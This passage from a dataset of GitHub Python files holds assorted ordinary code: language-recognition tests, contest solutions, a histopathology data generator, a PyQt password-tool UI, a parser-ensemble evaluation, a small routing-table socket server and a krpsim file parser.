testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n sentences = text2\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n sentences = text3\r\n predictions = model.predict(sentences)\r\n print(\"testing Sk text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text4\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text5\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text6\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text7\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text8\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = text9\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD1\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD2\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD3\r\n predictions = model.predict(sentences)\r\n print(\"testing Sk text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD4\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD5\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD6\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[1])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD7\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD8\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n\r\n\r\n sentences = textD9\r\n predictions = model.predict(sentences)\r\n print(\"testing SK text: \")\r\n print(predictions)\r\n successRate += testFastText(predictions, check[2])\r\n count+=1\r\n\r\n print(\"Success rate in %: \")\r\n print(100*successRate/count)\r\n print()\r\n 
print()\r\n\r\n","repo_name":"Jaroslav-Hrabal/LanguageRecognition","sub_path":"LanguageRecognition.py","file_name":"LanguageRecognition.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23457614031","text":"cases = []\r\nwith open('A-large.in') as f:\r\n n = int(f.readline())\r\n for i,line in enumerate(f):\r\n s,total = 0,0\r\n smax,digits = line.split()\r\n for j,k in enumerate(digits):\r\n if total < j:\r\n s += j-total\r\n total += j-total\r\n total += int(k)\r\n cases.append('Case #'+str(i+1)+': '+str(s)+'\\n')\r\n\r\nwith open('A-large-attempt0.out','w+') as g:\r\n g.writelines(cases)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/895.py","file_name":"895.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74728278594","text":"N, X = map(int, raw_input().split())\nx = map(int, raw_input().split())\n\nprint(N, X, x)\n\nen = X * (N + 1)\nprint(en)\nbefore = None\nx.append(0)\nfor i, v in enumerate(sorted(x, reverse=True)):\n if i == 0:\n en += ((i + 1) ** 2) * v\n else:\n en += ((i + 1) ** 2) * (before - v)\n before = v\n\n print(en)\n\n\n","repo_name":"kokukuma/atcoder","sub_path":"agc027/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3315924308","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom utils.data_utils import extract_df_info\nfrom typing import Dict, Optional, Tuple\n\n\nclass DataGenerator():\n \"\"\"\n Object to obtain the patches and labels.\n \"\"\"\n def __init__(self, config: Dict):\n \"\"\"\n Initialize data generator object\n :param config: dict containing config\n \"\"\"\n self.data_config = config[\"data\"]\n self.model_config = config[\"model\"]\n self.train_df = None\n self.val_df = None\n self.test_df = None\n self.wsi_df = None\n self.num_training_samples = 0\n self._create_data_generators()\n\n def _create_data_generators(self):\n \"\"\"\n Create data generators for supervised or semi-supervised multiple instance learning.\n The number of patch labels specified by 'positive_instance_labels_per_bag' is automatically obtained by\n randomly masking patch labels.\n\n :return: Keras image data generator providing the patches and (if available) labels.\n \"\"\"\n mode = self.model_config[\"mode\"]\n data_config = self.data_config\n if mode == 'train':\n self.load_dataframes(split='train')\n # Init setting of semi-supervised MIL training\n if data_config['supervision'] in ['mil', 'ssl']:\n self.train_generator_strong_aug = self.data_generator_from_dataframe(self.train_df, image_augmentation='strong',\n shuffle=True, target_mode='index')\n self.train_generator_weak_aug = self.data_generator_from_dataframe(self.train_df_weak_aug, image_augmentation='weak',\n shuffle=False, target_mode='None')\n self.num_training_samples = self.train_generator_weak_aug.n\n # Init supervised training setting\n else:\n self.train_df = self.train_df[self.train_df['class'] != self.data_config['num_classes']].reset_index()\n self.train_generator_strong_aug = self.data_generator_from_dataframe(self.train_df, image_augmentation='strong',\n shuffle=True, target_mode='index')\n self.train_generator_weak_aug = 
self.train_generator_strong_aug\n self.num_training_samples = self.train_generator_strong_aug.n\n self.validation_generator = self.data_generator_from_dataframe(self.val_df, target_mode='raw')\n elif mode =='test' or mode == 'predict':\n self.load_dataframes(split='test')\n self.validation_generator = self.data_generator_from_dataframe(self.val_df, target_mode='raw')\n self.test_generator = self.data_generator_from_dataframe(self.test_df, target_mode='raw')\n self.num_training_samples = self.test_generator.n # just formally necessary for model initialization\n elif mode == 'predict_features':\n self.load_dataframes(split='train')\n self.train_generator_weak_aug = self.data_generator_from_dataframe(self.train_df,\n image_augmentation='weak',\n shuffle=False, target_mode='None')\n self.validation_generator = self.data_generator_from_dataframe(self.val_df, target_mode='raw')\n self.load_dataframes(split='test')\n self.test_generator = self.data_generator_from_dataframe(self.test_df, target_mode='raw')\n\n else:\n raise Exception('Choose valid model mode')\n\n def data_generator_from_dataframe(self, dataframe: pd.DataFrame, image_augmentation: str = 'None',\n shuffle: bool = False, target_mode: str = 'class'):\n \"\"\"\n Wrapper around 'flow_from_dataframe'-method. Uses loaded dataframes to load images and labels.\n\n :param dataframe: dataframe containing patch paths and labels\n :param image_augmentation: 'strong','weak' or 'None' indicating the level of augmentation\n :param shuffle: bool to shuffle the data after each epoch\n :param target_mode: 'class': loads patch classes, 'index': loads indices instead, or 'None' only loads images\n :return: data generator loading patches and labels (or indices)\n \"\"\"\n if image_augmentation == 'weak':\n datagen = ImageDataGenerator(\n brightness_range=self.data_config[\"weak_augment_brightness_range\"],\n channel_shift_range=self.data_config[\"weak_augment_channel_shift\"],\n rotation_range=360,\n fill_mode='reflect',\n horizontal_flip=True,\n vertical_flip=True)\n elif image_augmentation == 'strong':\n datagen = ImageDataGenerator(\n brightness_range=self.data_config[\"strong_augment_brightness_range\"],\n channel_shift_range=self.data_config[\"strong_augment_channel_shift\"],\n rotation_range=360,\n fill_mode='reflect',\n horizontal_flip=True,\n vertical_flip=True)\n else:\n datagen = ImageDataGenerator()\n\n if target_mode == 'class':\n y_col = 'class'\n class_mode = 'categorical'\n classes = [str(i) for i in range(self.data_config[\"num_classes\"])]\n elif target_mode == 'index':\n y_col = 'index'\n class_mode = 'raw'\n classes = None\n else:\n y_col = 'index'\n class_mode = None\n classes = None\n\n dataframe['index'] = dataframe.index\n\n generator = datagen.flow_from_dataframe(\n dataframe=dataframe,\n directory=self.data_config[\"dir\"],\n x_col=\"image_path\",\n y_col=y_col,\n target_size=self.data_config[\"image_target_size\"],\n batch_size=self.model_config[\"batch_size\"],\n shuffle=shuffle,\n classes=classes,\n class_mode=class_mode,\n # save_to_dir=self.data_config['artifact_dir'] + '/' + image_augmentation,\n # save_format='jpeg'\n )\n\n return generator\n\n def load_dataframes(self, split):\n \"\"\"\n Load tables containing the patch paths and potentially classes.\n Loaded dataframes are stored as member variables.\n :param split: 'train', 'val' or 'test'\n \"\"\"\n if self.data_config[\"dataset_name\"] == \"breast_hist_images\":\n if split == 'train':\n train_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], 
\"train.txt\"))\n train_df[\"class\"] = train_df[\"image_path\"].str.extract(\"class(\\d+)\").astype(str)\n self.train_df = train_df\n val_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val.txt\"))\n val_df[\"class\"] = val_df[\"image_path\"].str.extract(\"class(\\d+)\").astype(str)\n self.val_df = val_df\n elif split == 'test':\n test_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"test.txt\"))\n test_df[\"class\"] = test_df[\"image_path\"].str.extract(\"class(\\d+)\").astype(str)\n self.test_df = test_df\n elif self.data_config[\"dataset_name\"] == \"camelyon16\":\n wsi_df = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"wsi_labels.csv\")).drop_duplicates().reset_index()\n wsi_df['class'] = wsi_df['P'].astype(int)\n wsi_df.rename(columns={\"slide\": \"slide_id\"}, inplace=True)\n self.wsi_df = wsi_df\n if split == 'train':\n train_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"train.csv\"))\n self.train_df = extract_df_info(train_df_raw, self.wsi_df, self.data_config, split='train')\n self.train_df_weak_aug = self.train_df[self.train_df['wsi_contains_unlabeled']]\n val_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n elif split == 'test':\n val_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n test_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"test.csv\"))\n self.test_df = extract_df_info(test_df_raw, self.wsi_df, self.data_config, split='test')\n elif self.data_config[\"dataset_name\"] == \"sicapv2\":\n self.wsi_df = pd.read_excel(os.path.join(self.data_config[\"dir\"], \"wsi_labels.xlsx\"))\n if split == 'train':\n train_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Train.xlsx\"))\n self.train_df = extract_df_info(train_df_raw, self.wsi_df, self.data_config, split='train')\n self.train_df_weak_aug = self.train_df[self.train_df['wsi_contains_unlabeled']]\n val_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Test.xlsx\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n elif split == 'test':\n val_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Test.xlsx\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n test_df_raw = pd.read_excel(os.path.join(self.data_config[\"data_split_dir\"], \"Test.xlsx\"))\n self.test_df = extract_df_info(test_df_raw, self.wsi_df, self.data_config, split='test')\n elif self.data_config[\"dataset_name\"] == \"panda\":\n wsi_df = pd.read_csv(os.path.join(self.data_config[\"dir\"], \"wsi_labels.csv\"))\n wsi_df['Gleason_primary'] = wsi_df['gleason_score'].str.split('+').str[0].astype(int)\n wsi_df['Gleason_secondary'] = wsi_df['gleason_score'].str.split('+').str[1].astype(int)\n wsi_df.rename(columns={\"image_id\": \"slide_id\"}, inplace=True)\n self.wsi_df = wsi_df\n if split == 'train':\n train_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"train_patches.csv\"))\n self.train_df = extract_df_info(train_df_raw, self.wsi_df, self.data_config, split='train')\n self.train_df_weak_aug = self.train_df[self.train_df['wsi_contains_unlabeled']]\n val_df_raw = 
pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val_patches.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n elif split == 'test':\n val_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"val_patches.csv\"))\n self.val_df = extract_df_info(val_df_raw, self.wsi_df, self.data_config, split='val')\n test_df_raw = pd.read_csv(os.path.join(self.data_config[\"data_split_dir\"], \"test_patches.csv\"))\n self.test_df = extract_df_info(test_df_raw, self.wsi_df, self.data_config, split='test')\n else:\n raise Exception(\"Please choose valid dataset name!\")\n\n def get_train_data_statistics(self):\n \"\"\"\n Calculate the number of labeled patches, classes and WSIs for statistics.\n :return: dict of statistics\n \"\"\"\n train_df = self.train_df\n wsi_df = self.wsi_df\n wsi_names = np.unique(np.array(train_df['wsi']))\n out_dict = {}\n out_dict['number_of_wsis'] = len(wsi_names)\n out_dict['number_of_patches'] = len(train_df)\n if self.data_config[\"dataset_type\"] == \"prostate_cancer\":\n out_dict['number_of_negative_patch_labels'] = np.sum(train_df['class'] == '0')\n out_dict['number_of_positive_patch_labels'] = np.sum(train_df['class'] == '1')\\\n + np.sum(train_df['class'] == '2') \\\n + np.sum(train_df['class'] == '3')\n out_dict['number_of_unlabeled_patches'] = np.sum(train_df['class'] == '4')\n else:\n out_dict['number_of_negative_patch_labels'] = np.sum(train_df['class'] == '0')\n out_dict['number_of_positive_patch_labels'] = np.sum(train_df['class'] == '1')\n out_dict['number_of_unlabeled_patches'] = np.sum(train_df['class'] == '2')\n\n return out_dict\n\n","repo_name":"arneschmidt/ssl_and_mil_cancer_classification","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"37199893291","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nrequirements = ['django',]\n\nsetup(\n name='django_template_uuid',\n version='0.0.1',\n description=\"Generate UUIDs for Django templates\",\n author=\"Michał Pasternak\",\n author_email='michal.dtz@gmail.com',\n url='https://github.com/mpasternak/django-template-uuid',\n packages=find_packages(),\n install_requires=requirements,\n license=\"MIT license\",\n zip_safe=True,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n ],\n)\n","repo_name":"mpasternak/django-template-uuid","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5605415520","text":"import cv2\r\nimport os\r\nimport os.path as osp\r\n\r\ncap = cv2.VideoCapture(\"data/train.mp4\")\r\n\r\nbgr_path = \"data/bgr\"\r\nif not osp.exists(bgr_path):\r\n os.makedirs(bgr_path)\r\n\r\n# with open(\"raws/train.txt\", \"r\") as f:\r\n# for i, l in enumerate(f):\r\n# pass\r\n# lines = i + 1\r\n\r\ncounter = 0\r\nwhile cap.isOpened():\r\n flag, img = cap.read()\r\n\r\n if flag:\r\n img = img[130:370]\r\n cv2.imshow(\"Img\", img)\r\n cv2.imwrite(osp.join(bgr_path, str(counter)+\".jpg\"), img)\r\n counter += 1\r\n else:\r\n print(\"finished reading video and writing images\")\r\n break\r\n\r\n 
cv2.waitKey(1)\r\n","repo_name":"pachiko/speed","sub_path":"readvid.py","file_name":"readvid.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70970412034","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_SecondWindow(object):\r\n def setupUi(self, SecondWindow):\r\n SecondWindow.setObjectName(\"SecondWindow\")\r\n SecondWindow.resize(286, 273)\r\n self.centralwidget = QtWidgets.QWidget(SecondWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.name = QtWidgets.QLabel(self.centralwidget)\r\n self.name.setGeometry(QtCore.QRect(51, 11, 220, 21))\r\n self.name.setObjectName(\"name\")\r\n self.eng = QtWidgets.QCheckBox(self.centralwidget)\r\n self.eng.setGeometry(QtCore.QRect(52, 78, 107, 20))\r\n self.eng.setStyleSheet(\"font-size : 10 ; color : darkred; font-weight: bold\")\r\n self.eng.setObjectName(\"eng\")\r\n self.symbols = QtWidgets.QCheckBox(self.centralwidget)\r\n self.symbols.setGeometry(QtCore.QRect(52, 132, 118, 20))\r\n self.symbols.setStyleSheet(\"font-size : 10 ; color : darkred; font-weight: bold\")\r\n self.symbols.setObjectName(\"symbols\")\r\n self.num = QtWidgets.QCheckBox(self.centralwidget)\r\n self.num.setGeometry(QtCore.QRect(52, 159, 82, 20))\r\n self.num.setStyleSheet(\"font-size : 10 ; color : darkred; font-weight: bold\")\r\n self.num.setObjectName(\"num\")\r\n self.horizontalScrollBar = QtWidgets.QScrollBar(self.centralwidget)\r\n self.horizontalScrollBar.setGeometry(QtCore.QRect(60, 210, 160, 16))\r\n self.horizontalScrollBar.setStyleSheet(\"background-color: brown\\n\"\r\n\"\")\r\n self.horizontalScrollBar.setMinimum(5)\r\n self.horizontalScrollBar.setMaximum(35)\r\n self.horizontalScrollBar.setOrientation(QtCore.Qt.Horizontal)\r\n self.horizontalScrollBar.setObjectName(\"horizontalScrollBar\")\r\n self.pasword_l = QtWidgets.QLabel(self.centralwidget)\r\n self.pasword_l.setGeometry(QtCore.QRect(60, 190, 99, 16))\r\n self.pasword_l.setObjectName(\"pasword_l\")\r\n self.pas_length = QtWidgets.QLabel(self.centralwidget)\r\n self.pas_length.setGeometry(QtCore.QRect(160, 190, 55, 16))\r\n self.pas_length.setObjectName(\"pas_length\")\r\n self.generate_b = QtWidgets.QPushButton(self.centralwidget)\r\n self.generate_b.setGeometry(QtCore.QRect(100, 240, 93, 28))\r\n self.generate_b.setStyleSheet(\"\")\r\n self.generate_b.setObjectName(\"generate_b\")\r\n self.ua = QtWidgets.QCheckBox(self.centralwidget)\r\n self.ua.setGeometry(QtCore.QRect(52, 105, 120, 20))\r\n self.ua.setStyleSheet(\"font-size : 10; color : darkred; font-weight: bold\")\r\n self.ua.setObjectName(\"ua\")\r\n self.show_result = QtWidgets.QLineEdit(self.centralwidget)\r\n self.show_result.setGeometry(QtCore.QRect(51, 48, 221, 22))\r\n self.show_result.setObjectName(\"show_result\")\r\n self.name.raise_()\r\n self.pasword_l.raise_()\r\n self.ua.raise_()\r\n self.symbols.raise_()\r\n self.eng.raise_()\r\n self.num.raise_()\r\n self.horizontalScrollBar.raise_()\r\n self.pas_length.raise_()\r\n self.show_result.raise_()\r\n self.generate_b.raise_()\r\n SecondWindow.setCentralWidget(self.centralwidget)\r\n\r\n self.retranslateUi(SecondWindow)\r\n self.horizontalScrollBar.valueChanged['int'].connect(self.pas_length.setNum) # type: ignore\r\n QtCore.QMetaObject.connectSlotsByName(SecondWindow)\r\n\r\n def retranslateUi(self, SecondWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n SecondWindow.setWindowTitle(_translate(\"SecondWindow\", 
\"MainWindow\"))\r\n self.name.setText(_translate(\"SecondWindow\", \"

Password generating tool

\"))\r\n self.eng.setText(_translate(\"SecondWindow\", \"English letters\"))\r\n self.symbols.setText(_translate(\"SecondWindow\", \"Special symbols\"))\r\n self.num.setText(_translate(\"SecondWindow\", \"Numbers \"))\r\n self.pasword_l.setText(_translate(\"SecondWindow\", \"

Password length:

\"))\r\n self.pas_length.setText(_translate(\"SecondWindow\", \"

5

\"))\r\n self.generate_b.setText(_translate(\"SecondWindow\", \"Generate\"))\r\n self.ua.setText(_translate(\"SecondWindow\", \"Ukrainian letters\"))\r\n","repo_name":"Walkoszes/Daily-helper","sub_path":"password_window_ui.py","file_name":"password_window_ui.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"452513329","text":"from corpuscula.corpus_utils import download_ud, UniversalDependencies, \\\n AdjustedForSpeech\nfrom morra import MorphParser3\nfrom morra.morph_ensemble import MorphEnsemble\nimport os\nimport sys\n\n###\nimport sys\nsys.path.append('../')\n###\nimport _get_names_db\nfrom scripts.local_methods_syntagrus import guess_pos, guess_lemma, guess_feat\n\n# we use UD Taiga corpus only as example. For real model training comment\n# Taiga and uncomment SynTagRus\ncorpus_name = 'UD_Russian-Taiga'\n#corpus_name = 'UD_Russian-SynTagRus'\n\ndownload_ud(corpus_name, overwrite=False)\ntrain_corpus = dev_corpus = test_corpus = UniversalDependencies(corpus_name)\n#train_corpus = dev_corpus = test_corpus = \\\n# AdjustedForSpeech(UniversalDependencies(corpus_name))\n\n# all models should be in MODEL_DIR directory\nMODEL_DIR = 'ensemble'\n# their names should be model..pickle\nMODEL_FN_TPL = 'model.{}.pickle'\nSEEDS = [2, 4, 24, 42]\n\ndef get_model(seed):\n mp = MorphParser3(guess_pos=guess_pos, guess_lemma=guess_lemma,\n guess_feat=guess_feat)\n fn = os.path.join(MODEL_DIR, MODEL_FN_TPL.format(seed))\n mp.load(fn)\n return mp\n\ndef remove_pos(model):\n model._pos_model = None\n model._pos_rev_model = None\n model._pos2_model = None\n\ndef remove_feats(model):\n model._feats_model = None\n model._feats_rev_model = None\n model._feats2_model = None\n model._feats_models = {}\n model._feats_rev_models = {}\n model._feats2_models = {}\n\nme = None\nfor seed in SEEDS:\n mp = get_model(load_corpuses=False, load_model=True, seed=seed)\n # remove excess models for to save memory\n remove_feats(mp)\n if not me:\n me = MorphEnsemble(mp._cdict)\n #me.add(mp.predict_pos, rev=True)\n #me.add(mp.predict_pos, rev=False)\n me.add(mp.predict_pos2, with_backoff=True)\nme.evaluate('UPOS', test_corpus)\n\nme = None\nfor _r in [1, 0, -1]:\n for seed in SEEDS:\n mp = get_model(load_corpuses=False, load_model=True, seed=seed)\n remove_feats(mp)\n if not me:\n me = MorphEnsemble(mp._cdict)\n # add each model 3 times with different params:\n if _r < 0:\n me.add(mp.predict_pos2, with_backoff=True)\n else:\n me.add(mp.predict_pos2, with_backoff=False, max_repeats=_r)\nme.evaluate('UPOS', test_corpus)\n","repo_name":"fostroll/morra","sub_path":"examples/ensemble_eval.py","file_name":"ensemble_eval.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22283224596","text":"# -*- coding: utf-8 -*-\r\nfrom socket import *\r\nimport socket\r\nfrom socket import socket\r\n\r\nimport sys\r\n\r\nhost = '10.80.0.12'\r\nport = 88\r\nsocketConnection = socket(AF_INET,SOCK_STREAM)\r\nsocketConnection.bind((host, port))\r\nsocketConnection.listen(1)\r\n\r\ndestinations = {\r\n 'destination0': {'interface': '52.38.130.148', 'Cost': 1},\r\n 'destination1': {'interface': 'localhost', 'Cost': 0},\r\n 'destination2': {'interface': '128.235.211.21', 'Cost': 3},\r\n 'destination3': {'interface': '128.235.209.204', 'Cost': 5}}\r\n\r\nprint ('Successful socket binding')\r\nwhile True:\r\n client, addr = socket.accept()\r\n print 
('Established connection with:', addr)\r\n message = client.recv(1024).decode()\r\n print(message)\r\n table = str(table)\r\n client.send(table.encode())\r\n client.close()\r\nelse:\r\n client.close()\r\nprint('Cannot connect. Try again.')\r\n","repo_name":"dg253/vectorProgramming","sub_path":"afs2.py","file_name":"afs2.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4864707819","text":"import sys\n\nfrom src.krpsim.utils import split_need_result_delay, build_process_dic\n\nclass Parser:\n \"\"\"\n Parsing Class, heart of the parsing is here.\n -> stocks is a list of Stock class instances\n -> content is a list of Process class instances\n -> optimize is a list of Optimize class instances\n -> delay corresponds to the maximal delay given as a parameter\n \"\"\"\n def __init__(self, options):\n self.path, self.delay = options.input_path, options.delay\n self.stocks = {}\n self.content = {}\n self.optimize = []\n self.verbose = options.verbose\n self.fd = open(self.path, 'r+')\n\n def main_parsing(self):\n \"\"\"\n Main parsing loop, the goal here is to iterate over\n the fd content, and to parse every line we encounter to\n determine its type\n \"\"\"\n curr_line = None\n for line in self.fd:\n if line[0] == '#':\n print(\"Found a comment\") if self.verbose == 1 or self.verbose == 3 else 0\n continue\n elif len(line) == 1 and line[0] == '\\n':\n print(\"Skipping empty line\") if self.verbose == 1 or self.verbose == 3 else 0\n continue\n else:\n curr_line = self.parse_line(line)\n self.fill_parser_lists(curr_line)\n print(curr_line) if self.verbose == 1 or self.verbose == 3 else 0\n self.fd = self.fd.close()\n\n def fill_parser_lists(self, line):\n \"\"\"\n Comparing the line type after parse_line,\n we compare class instances with the base classes\n \"\"\"\n if type(line) is Process:\n self.content[line.name] = line\n elif type(line) is Optimize:\n self.optimize.append(line)\n elif type(line) is Stock:\n self.stocks[line.name] = line\n\n\n def verify_parsing_content(self):\n \"\"\"\n Afterward check method for the parsing content\n \"\"\"\n if not self.optimize:\n sys.exit(\"Missing optimize content.\")\n elif not self.stocks:\n sys.exit(\"Missing initial stocks.\")\n elif not self.content:\n sys.exit(\"No process detected inside {}, please provide at least one\".format(self.path))\n #Check if what need to be optimized is indeed inside at least one process and is accesible\n #like if the process never gets called because of stocks that can never be filled, then\n #the optimize values are not valid.\n\n def parse_line(self, line):\n \"\"\"\n Method used to parse a line and extract the corresponding elem\n tmp -> Used for splitting the line and removing some junk from the list\n res -> Class instance, either Stock, Process or Optimize\n every instance is filled with the corresponding params\n \"\"\"\n tmp = None\n res = None\n line = line.replace('\\n', '')\n tmp = [i for i in line.split(':')]\n tmp.pop(tmp.index('')) if '' in tmp else tmp\n # Parsing for stock elem\n if '(' not in line:\n if tmp[0].isalpha() and tmp[1].isdecimal() or\\\n tmp[0].replace('_', '').isalpha() and tmp[1].isdecimal():\n res = Stock(tmp[0], int(tmp[1]))\n else:\n res = 'Error'\n # Parsing for optimize elem\n elif 'optimize:' in line:\n if tmp[-1].isdigit():\n sys.exit(\"You can't specify a delay for an optimize element, error with \\033[4m{}\\033[0m\"\n .format(line))\n tmp = str(tmp[1]).replace('(', 
'').replace(')', '')\n res = Optimize(tmp.split(';'))\n # Parsing for process elem\n elif tmp[-1].isdigit():\n tmp = [i.replace(')', '') for i in line.split('(')]\n name, need, result, delay = split_need_result_delay(tmp, line)\n res = Process(name, build_process_dic(need), build_process_dic(result), delay)\n # Invalid elem\n elif not tmp[-1].isdigit():\n sys.exit(\"Error with \\033[4m{}\\033[0m, invalid element.\".format(line))\n return res\n\nclass Stock:\n \"\"\"\n Stock elem associated Class\n -> name is obviously the stock name\n -> qty is the quantity available for this stock\n \"\"\"\n def __init__(self, name, qty):\n self.name = name\n self.qty = qty\n\n def __str__(self):\n return '\\033[1mStock\\033[0m -> \\033[38;5;155m{}\\033[0m : {}'.format(self.name, self.qty)\n\n def __eq__(self, other):\n return self.name == other.name and self.qty == other.qty\n\n\nclass Process:\n \"\"\"\n Process elem associated Class\n -> name is obviously the process name\n -> need is a list of stocks (name & qty) needed to run this process\n -> result is a list of resulting stocks after running the process\n -> delay is the delay needed to run the process\n \"\"\"\n def __init__(self, name, need, result, delay):\n self.name = name\n self.need = need\n self.result = result\n self.delay = delay\n\n def __str__(self):\n return '\\033[38;5;74m{}\\033[0m - \\033[1mneeds\\033[0m : {} -> \\033[1mresult\\033[0m : {} - \\033[1mdelay\\033[0m : {}'\\\n .format(self.name, self.need, self.result, self.delay)\n\n def __eq__(self, other):\n return self.name == other.name and \\\n self.delay == other.delay and \\\n self.need == other.need and \\\n self.result == other.result\n\nclass Optimize:\n \"\"\"\n Optimize elem associated Class\n -> opti_elems is a list of name associated with what is\n to optimize, like client and time\n \"\"\"\n def __init__(self, elems):\n self.opti_elems = [i for i in elems]\n\n def __str__(self):\n return '\\033[1mOptimize\\033[0m -> \\033[38;5;218m{}\\033[0m'.format(str(self.opti_elems).replace('[', '').replace(']', ''))\n \n def __eq__(self, other):\n return self.opti_elems == other.opti_elems\n","repo_name":"arlaine4/Krp","sub_path":"src/krpsim/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5071445207","text":"#!/usr/bin/env python3\nimport os\nimport sys \nimport socket\nimport datetime\nimport logging\nfrom time import ctime \nfrom Cryptodome.Cipher import AES \nfrom binascii import b2a_hex, a2b_hex\nfrom subprocess import 